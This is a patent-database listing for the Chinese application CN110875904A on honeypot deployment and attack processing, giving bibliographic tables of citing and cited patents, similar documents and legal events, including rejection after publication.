| CN110875904A true CN110875904A (en) | 2020-03-10 |
Family
ID=69715496
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201811012513.9A Pending CN110875904A (en) | 2018-08-31 | 2018-08-31 | Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110875904A (en) |
Cited By (11)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN111565199A (en) * | 2020-07-14 | 2020-08-21 | 腾讯科技(深圳)有限公司 | Network attack information processing method and device, electronic equipment and storage medium |
| CN111818062A (en) * | 2020-07-10 | 2020-10-23 | 四川长虹电器股份有限公司 | Docker-based CentOS high-interaction honeypot system and implementation method thereof |
| CN111866007A (en) * | 2020-07-28 | 2020-10-30 | 福建奇点时空数字科技有限公司 | Honeypot threat data-oriented clustering and attribution analysis method |
| CN111901325A (en) * | 2020-07-20 | 2020-11-06 | 杭州安恒信息技术股份有限公司 | Service expansion method and device for honeypot node, electronic device and storage medium |
| CN112152994A (en) * | 2020-08-19 | 2020-12-29 | 广州锦行网络科技有限公司 | Method for realizing dynamic expansion and contraction capacity of honey net |
| CN112291247A (en) * | 2020-10-30 | 2021-01-29 | 四川长虹电器股份有限公司 | Flow forwarding-based honey net system for high coverage detection of local area network |
| CN112367307A (en) * | 2020-10-27 | 2021-02-12 | 中国电子科技集团公司第二十八研究所 | Intrusion detection method and system based on container-grade honey pot group |
| CN112866259A (en) * | 2021-01-22 | 2021-05-28 | 杭州木链物联网科技有限公司 | Industrial control honey pot node management method and device, computer equipment and storage medium |
| CN113098906A (en) * | 2021-05-08 | 2021-07-09 | 广州锦行网络科技有限公司 | Application method of micro honeypots in modern families |
| CN114221815A (en) * | 2021-12-16 | 2022-03-22 | 北京国腾创新科技有限公司 | Intrusion detection method, storage medium and system based on honey arranging net |
| CN114448731A (en) * | 2022-04-07 | 2022-05-06 | 广州锦行网络科技有限公司 | Honeypot deployment method, device, equipment and computer readable medium |
Citations (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20050082681A (en) * | 2004-02-20 | 2005-08-24 | 한국과학기술원 | Honeypot system |
| CN102685147A (en) * | 2012-05-31 | 2012-09-19 | 东南大学 | Mobile communication honeypot capturing system and implementation method thereof |
| US20170230336A1 (en) * | 2016-02-10 | 2017-08-10 | Level 3 Communications, Llc | Automated honeypot provisioning system |
| CN107222515A (en) * | 2016-03-22 | 2017-09-29 | 阿里巴巴集团控股有限公司 | Honey jar dispositions method, device and cloud server |
| CN107423619A (en) * | 2016-05-23 | 2017-12-01 | 中国科学院声学研究所 | A kind of method during the structure intelligent terminal WEB operations based on virtualization technology |
| CN107707576A (en) * | 2017-11-28 | 2018-02-16 | 深信服科技股份有限公司 | A kind of network defense method and system based on Honeypot Techniques |
| CN107819731A (en) * | 2016-09-13 | 2018-03-20 | 北京长亭科技有限公司 | A kind of network security protection system and correlation technique |
| CN108337219A (en) * | 2017-11-27 | 2018-07-27 | 中国电子科技集团公司电子科学研究院 | A kind of method and storage medium of Internet of Things anti-intrusion |
-
2018
- 2018-08-31 CN CN201811012513.9A patent/CN110875904A/en active Pending
Patent Citations (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| KR20050082681A (en) * | 2004-02-20 | 2005-08-24 | 한국과학기술원 | Honeypot system |
| CN102685147A (en) * | 2012-05-31 | 2012-09-19 | 东南大学 | Mobile communication honeypot capturing system and implementation method thereof |
| US20170230336A1 (en) * | 2016-02-10 | 2017-08-10 | Level 3 Communications, Llc | Automated honeypot provisioning system |
| CN107222515A (en) * | 2016-03-22 | 2017-09-29 | 阿里巴巴集团控股有限公司 | Honey jar dispositions method, device and cloud server |
| CN107423619A (en) * | 2016-05-23 | 2017-12-01 | 中国科学院声学研究所 | A kind of method during the structure intelligent terminal WEB operations based on virtualization technology |
| CN107819731A (en) * | 2016-09-13 | 2018-03-20 | 北京长亭科技有限公司 | A kind of network security protection system and correlation technique |
| CN108337219A (en) * | 2017-11-27 | 2018-07-27 | 中国电子科技集团公司电子科学研究院 | A kind of method and storage medium of Internet of Things anti-intrusion |
| CN107707576A (en) * | 2017-11-28 | 2018-02-16 | 深信服科技股份有限公司 | A kind of network defense method and system based on Honeypot Techniques |
Non-Patent Citations (1)
| Title |
|---|
| PENTHINGS: "Docker 官方镜像现在支持多平台架构", 《HTTPS://MY.OSCHINA.NET/U/2306127/BLOG/1593636》 * |
Cited By (12)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN111818062A (en) * | 2020-07-10 | 2020-10-23 | 四川长虹电器股份有限公司 | Docker-based CentOS high-interaction honeypot system and implementation method thereof |
| CN111565199A (en) * | 2020-07-14 | 2020-08-21 | 腾讯科技(深圳)有限公司 | Network attack information processing method and device, electronic equipment and storage medium |
| CN111565199B (en) * | 2020-07-14 | 2021-10-01 | 腾讯科技(深圳)有限公司 | Network attack information processing method and device, electronic equipment and storage medium |
| CN111901325A (en) * | 2020-07-20 | 2020-11-06 | 杭州安恒信息技术股份有限公司 | Service expansion method and device for honeypot node, electronic device and storage medium |
| CN111866007A (en) * | 2020-07-28 | 2020-10-30 | 福建奇点时空数字科技有限公司 | Honeypot threat data-oriented clustering and attribution analysis method |
| CN112152994A (en) * | 2020-08-19 | 2020-12-29 | 广州锦行网络科技有限公司 | Method for realizing dynamic expansion and contraction capacity of honey net |
| CN112367307A (en) * | 2020-10-27 | 2021-02-12 | 中国电子科技集团公司第二十八研究所 | Intrusion detection method and system based on container-grade honey pot group |
| CN112291247A (en) * | 2020-10-30 | 2021-01-29 | 四川长虹电器股份有限公司 | Flow forwarding-based honey net system for high coverage detection of local area network |
| CN112866259A (en) * | 2021-01-22 | 2021-05-28 | 杭州木链物联网科技有限公司 | Industrial control honey pot node management method and device, computer equipment and storage medium |
| CN113098906A (en) * | 2021-05-08 | 2021-07-09 | 广州锦行网络科技有限公司 | Application method of micro honeypots in modern families |
| CN114221815A (en) * | 2021-12-16 | 2022-03-22 | 北京国腾创新科技有限公司 | Intrusion detection method, storage medium and system based on honey arranging net |
| CN114448731A (en) * | 2022-04-07 | 2022-05-06 | 广州锦行网络科技有限公司 | Honeypot deployment method, device, equipment and computer readable medium |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN110875904A (en) | Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device | |
| US10834108B2 (en) | Data protection in a networked computing environment | |
| US10270807B2 (en) | Decoy and deceptive data object technology | |
| US9762599B2 (en) | Multi-node affinity-based examination for computer network security remediation | |
| US10560434B2 (en) | Automated honeypot provisioning system | |
| US10567431B2 (en) | Emulating shellcode attacks | |
| US9535731B2 (en) | Dynamic security sandboxing based on intruder intent | |
| US9906547B2 (en) | Mechanism to augment IPS/SIEM evidence information with process history snapshot and application window capture history | |
| CN114342319A (en) | Honeypot for infrastructure as a service security | |
| US10599842B2 (en) | Deceiving attackers in endpoint systems | |
| TW201703483A (en) | Methods and systems for improving analytics in distributed networks | |
| US10225284B1 (en) | Techniques of obfuscation for enterprise data center services | |
| CN110647744A (en) | Identifying and extracting key hazard forensic indicators using object-specific file system views | |
| CN112822147B (en) | Method, system and equipment for analyzing attack chain | |
| CN112995168B (en) | Web server safety protection method, system and computer storage medium | |
| CN114553529A (en) | Data processing method, device, network equipment and storage medium | |
| Banas | Cloud forensic framework for iaas with support for volatile memory | |
| CN114124414A (en) | Honeypot service generation method and device and attack behavior data capturing method | |
| CN114285660B (en) | Honey net deployment method, device, equipment and medium | |
| US11374959B2 (en) | Identifying and circumventing security scanners | |
| Alharkan | IDSaaS: Intrusion Detection system as a Service in public clouds | |
| CN117278259A (en) | Honey pot self-adaptive deployment method and system based on flow characteristics | |
| WO2017187379A1 (en) | Supply chain cyber-deception | |
| Even et al. | Key fingerprint= AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| REG | Reference to a national code |
Ref country code: HK Ref legal event code: DE Ref document number: 40025331 Country of ref document: HK |
|
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20200310 |
|
| RJ01 | Rejection of invention patent application after publication |